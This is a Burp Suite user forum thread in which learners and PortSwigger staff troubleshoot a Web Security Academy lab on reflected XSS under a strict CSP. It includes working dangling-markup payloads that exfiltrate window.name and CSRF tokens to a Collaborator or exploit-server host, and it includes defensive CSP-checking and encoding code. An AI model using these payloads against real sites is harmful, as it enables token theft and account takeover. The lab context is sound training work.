Burp Suite User Forum


Lab: Reflected XSS protected by very strict CSP, with dangling markup attack

Alexander | Last updated: Apr 30, 2023 03:24PM UTC

I can't complete the lab. After I "Deliver the exploit" to victim, I get nothing in the Collaborator. No response at all. I follow everything it says in the solution, I tried several videos with people doing it, but nothing helps. In other labs the Collaborator works just fine. It is just this lab. Any tips?

Ben, PortSwigger Agent | Last updated: May 03, 2023 09:03AM UTC

Hi Alex, I have just replied to your email about this but, for completeness, I will add this here as well. We have had a look at this and we think the suggested solution is slightly incorrect. It should read as follows (there appears to be an erroneous '/web-security/cross-site-scripting/content-security-policy/' path within the script): <script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> Are you able to try this and see if this then works for you?

Alexander | Last updated: May 03, 2023 11:39AM UTC

Thank you very much, your script worked like a charm! Got the lab completed.

rayman | Last updated: Jul 25, 2023 12:44PM UTC

Is there a particular reason why the solution hasn't been updated since? I had to find this issue to understand that the provided solution is erroneous after trying to understand it for quite some time :D

Ben, PortSwigger Agent | Last updated: Jul 25, 2023 12:50PM UTC

Hi, the work to change the solution is still with the content team, I am afraid. They are a small team but will be working on this in due course.

rayman | Last updated: Jul 25, 2023 01:15PM UTC

I understand that. Disregarding this small issue, the labs are extremely good and educational. Thanks for responding!

Matteo | Last updated: Dec 09, 2023 12:41PM UTC

Hi, I have the same problem... And Ben's script doesn't work anymore (now it's the official solution)... I've tried with my payload and it doesn't work... I've tried with the official solution and it doesn't work... Investigating, the problem seems to be the <base> tag: in fact, when I click on "Click me" and I go to the new tab and try to read "window.name" from the Developer Console, it is empty... Maybe the problem is related to "\n" chars in the "target" attribute of the <base> tag... In fact, trying locally, if I set a "target" attribute without "\n", it works, setting the "window.name" of the new tab... But if there are "\n" chars, it does not... Does anyone have some useful info to complete this lab? Thanks

Ben, PortSwigger Agent | Last updated: Dec 11, 2023 10:35AM UTC

Hi Matteo, unfortunately a Chrome update has rendered the existing written solution invalid. We believe that we have a new way to solve the lab but are currently running a small competition for users to try and identify a new approach: https://twitter.com/portswiggerres/status/1726605124443750893?s=46 We will update the official written solution in due course.

Filip | Last updated: May 24, 2024 05:27PM UTC

Really nice lab. I have found another solution to exploit the XSS with Chrome blocking the dangling markup attack.

wilson | Last updated: Jun 05, 2024 07:58AM UTC

That's true. Nice lab. I have tested another solution, and it works. Hint: use formaction.

Sandeep | Last updated: Jun 20, 2024 11:16AM UTC

Can anyone post a better alternative hint/solution for this lab? I am a beginner and I tried the lab for 2 days but am not able to solve it.

Ben, PortSwigger Agent | Last updated: Jun 20, 2024 12:09PM UTC

Hi Sandeep, The following alternative solution should still work: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Hamza | Last updated: Jul 02, 2024 05:22AM UTC

I have tried all the solutions that are here, but none of them is working.

Ben, PortSwigger Agent | Last updated: Jul 02, 2024 09:34AM UTC

Hi Hamza, I have just tried the alternative solution provided in the link in the previous post and this still works - are you able to clarify what steps you have taken and what issues you are currently facing so that we can assist you further with this?

Hamza | Last updated: Jul 04, 2024 06:35PM UTC

Hey Ben, I have tried the solution from: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ When I try this <script> location='https://0a3a006c041ba288822ff20900fa00c8.web-security-academy.net/my-account?email=%22%3E%3C/form%3E%3Cform%20class=%22login-form%22%20name=%22evil-form%22%20action=%22https://exploit-0aad00e50419a26982bdf14301f9006c.exploit-server.net/log%22%20method=%22GET%22%3E%3Cbutton%20class=%22button%22%20type=%22submit%22%3E%20Click%20me%20%3C/button%3E'; </script> I don't get the CSRF token from the victim. I have checked the logs many times.

Hamza | Last updated: Jul 04, 2024 06:45PM UTC

Well, I tried again and now I have solved it, thank you. I used this: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Joshua | Last updated: Jul 27, 2024 12:16AM UTC

Does that only work in Chrome? I can't hit the collab server using that solution in firefox.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 07:13AM UTC

Hi Joshua, I have only tried the alternative solution in Firefox - which did work for me.

bruhmoment236 | Last updated: Aug 07, 2024 01:14PM UTC

It doesn't work now. It seems like the bot isn't clicking on the button, from what I have tested. If I try the exploit myself and simulate the click, I get the CSRF token without any problems.

Michelle, PortSwigger Agent | Last updated: Aug 08, 2024 09:56AM UTC

Hi, if you're following the solution published with the lab, you will encounter issues. Have you tried out the steps in this solution? https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ I've just tested with these and was able to solve the lab. You may need to wait a minute before the victim visits, but you can keep an eye on the exploit server logs to know when they visit. Note: you will need to make sure that the POC you create uses a different email address to the one used by your normal user.

Mostafa | Last updated: Aug 19, 2024 01:49PM UTC

Thanks. I was stuck but tried this solution and it really works: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

Yuyu | Last updated: Sep 30, 2024 02:18PM UTC

Hi, I tried the solution. The bot doesn't seem to click the button and leak the CSRF token. <script> location='https://0ab30080033b6b968b73f4a50058006d.web-security-academy.net/my-account?email="></form><form class="login-form" name="evil-form" action="https://exploit-0a590010031d6bdf8b5bf31f01490052.exploit-server.net/log" method="GET"><button class="button" type="submit">Click</button'; </script> A manual click did log my own CSRF token. I waited a while, but still no victim click.
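Both payload variants in this thread (the original <base target> one and the later <form action> one) rely on two things: the email value being reflected unencoded into an attribute, and the lab's CSP leaving the form-submission channel open. The following is an added example, not PortSwigger's or skullhat's code, showing the defender-side checks: a small CSP parser that flags a missing or wildcard form-action directive (form-action does not fall back to default-src), and the attribute-context encoding that removes the injection itself. The sample policies and inputs are constructed.

```python
import html


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [source, ...]}.

    Directives are separated by ';'. If a directive is repeated, browsers keep
    the first occurrence and ignore the rest, so we do the same.
    """
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def dangling_markup_gaps(header: str) -> list[str]:
    """Return the directives whose absence lets a dangling <form> exfiltrate.

    A dangling <form action=EXTERNAL method=GET> carries everything up to the
    next closing quote (including the CSRF token field) off-origin when the
    victim submits it. default-src does NOT cover form submissions, so the
    policy needs an explicit form-action that is not '*'.
    Note: no CSP directive stops the <base target> / window.name variant;
    only output encoding (below) removes that one.
    """
    policy = parse_csp(header)
    gaps = []
    form_action = policy.get("form-action")
    if form_action is None or "*" in form_action:
        gaps.append("form-action")
    return gaps


def render_email_field(email: str) -> str:
    """Reflect the email into an attribute with attribute-context encoding.

    The lab's bug is that the value is echoed raw, so a leading '">' closes
    the attribute and the tag. html.escape(quote=True) turns '"', '<', '>'
    and '&' into entities, so the reflected text can never leave the value.
    """
    return f'<input name="email" value="{html.escape(email, quote=True)}">'


if __name__ == "__main__":
    # Constructed policy in the style of the lab's "very strict" CSP (assumption).
    strict = "default-src 'self'; object-src 'none'; script-src 'self'; img-src 'self'"
    print(dangling_markup_gaps(strict))                   # ['form-action']
    print(dangling_markup_gaps(strict + "; form-action 'self'"))  # []
    print(render_email_field('"></form><form action="https://attacker.example/log">'))
```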

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:44AM UTC

Hi, Are you still having issues with this as of right now?
